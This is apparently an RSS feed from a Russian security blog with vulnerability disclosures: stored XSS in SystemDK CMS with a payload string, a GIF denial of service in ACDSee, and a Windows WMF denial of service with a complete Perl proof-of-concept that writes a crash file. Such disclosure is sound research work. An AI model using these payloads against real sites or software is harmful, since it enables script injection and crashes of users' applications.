<?xml version="1.0" encoding="windows-1251"?>

<rss version="2.0">
 <channel>
	<title>Отказ в обслуживаний</title>
	<guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/</guid>
	<link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/</link>
	<description></description>
	<language>ru</language>
	<docs>http://backend.userland.com/rss2</docs>
	<pubDate>Fri, 03 Sep 2010 12:32:29 +0400</pubDate>

    <item>
      <title>Множественные XSS в SystemDK CMS</title>
      <description><![CDATA[Обнаружил вот такие косячки за SystemDK CMS.<br />Активные XSS:<br /><br />1. <a href='http://www.systemdk.ru/dkmodules.php?name=Files&dkgo=add_file' target='_blank'>http://www.systemdk.ru/dkmodules.php?...o=add_file</a> <br /><br />Активная XSS почти во всех полях: Заголовок, Описание, Имя автора, Емайл автора, Домашняя страница, Ссылка на файл. Самое удобное для внедрения скрипта поле "Домашняя страница".<img src="http://www.securitylab.ru/bitrix/images/blog/smile/icon_smile.gif" border="0" alt="smile:)" title="" />)<br /><br />http://"style="background:url(javascript:alert(1))/** <br /><br />[URL=http://www.securityblogs.ru/index.php?act=1&id=1]Подробнее&gt;&gt;[/URL<br /><a href="http://www.securitylab.ru/blog/personal/DoS_in_WMF/3775.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3775.php</link>
      <guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3775.php</guid>
      <pubDate>Sat, 05 Jan 2008 00:10:32 +0300</pubDate>
    </item>

    <item>
      <title>Отказ в обслуживании при обработке GIF в ACDSee</title>
      <description><![CDATA[Удаленный пользователь может с помощью специально сформированного GIF изображения вызвать отказ в обслуживании ACDSee Viewer. Уязвимость существует из-за ошибки при обработке элемента Block Size структуры GIF Graphic Control Extension Block. Уязвима версия ACDSee 8.2.1 и более ранние.<br />   Размер блока - Block Size в корректном gif-файле всегда равняется 4 и для меня остаётся загадкой, почему программисты из компании ACD Systems решили брать это значение из GIF файла.<br />Эксплоит: <a href='http://www.securityblogs.ru/downloads/acdsee_dos_c.html' target='_blank'>acdsee_dos.c</a><br /><a href="http://www.securitylab.ru/blog/personal/DoS_in_WMF/3765.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3765.php</link>
      <guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3765.php</guid>
      <pubDate>Fri, 04 Jan 2008 00:19:58 +0300</pubDate>
    </item>

    <item>
      <title>Подробнее о баге тут:</title>
      <description><![CDATA[<a href='http://www.securityblogs.ru/index.php?act=1&id=4' target='_blank'>SecurityBlogs</a><br /><a href="http://www.securitylab.ru/blog/personal/DoS_in_WMF/3415.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3415.php</link>
      <guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3415.php</guid>
      <pubDate>Thu, 22 Nov 2007 06:37:12 +0300</pubDate>
    </item>

    <item>
      <title>Отказ в обслуживаний в WMF</title>
      <description><![CDATA[<span style="font-family:Verdana"><br />Удаленный пользователь может с помощью специально сформированного изображения вызвать отказ в обслуживании приложения, использующего уязвимую библиотеку.<br />  Это происходит при отображении ESCAPE-метазаписи (фунция STARTDOC)так как, не инициализированый адреса импорта функции SeekPrinter из winspool.drv.<br />  Уязвимыми оказываются не только приложения успользующие напрямую GDI, но и приложения использующие функции shimgvw.dll как "высокоуровневой обёртки" GDI, такие как "Программа просмотра изображений и факсов" и Windows Explorer.<br /> Способов устранения уязвимости не существует в настоящее время. <br /><br />Эксплоит:<br /><br />#!/usr/bin/perl<br /><br />print "\nWMF PoC denial of service exploit by AzM";<br />print "\n\ngenerating crash.wmf...";<br />open(WMF, "&gt;./crash.wmf") or die "cannot create wmf file\n";<br />print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x01\x00\x84\x43\x0<WBR/>&shy;0\x00";<br />print WMF "\x00\x00\x10\x00\x00\x00\x26\x06\x0A\x00\x16\x00\x90\x90\x9<WBR/>&shy;0\x90";<br />print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9<WBR/>&shy;0\x90";<br />print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x0<WBR/>&shy;3\x00";<br />print WMF "\x00\x00\x00\x00";<br />close(WMF);<br />print "Ok\n";<br /></span><br /><a href="http://www.securitylab.ru/blog/personal/DoS_in_WMF/681.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/681.php</link>
      <guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/681.php</guid>
      <pubDate>Thu, 22 Feb 2007 09:04:30 +0300</pubDate>
    </item>

  </channel>
</rss>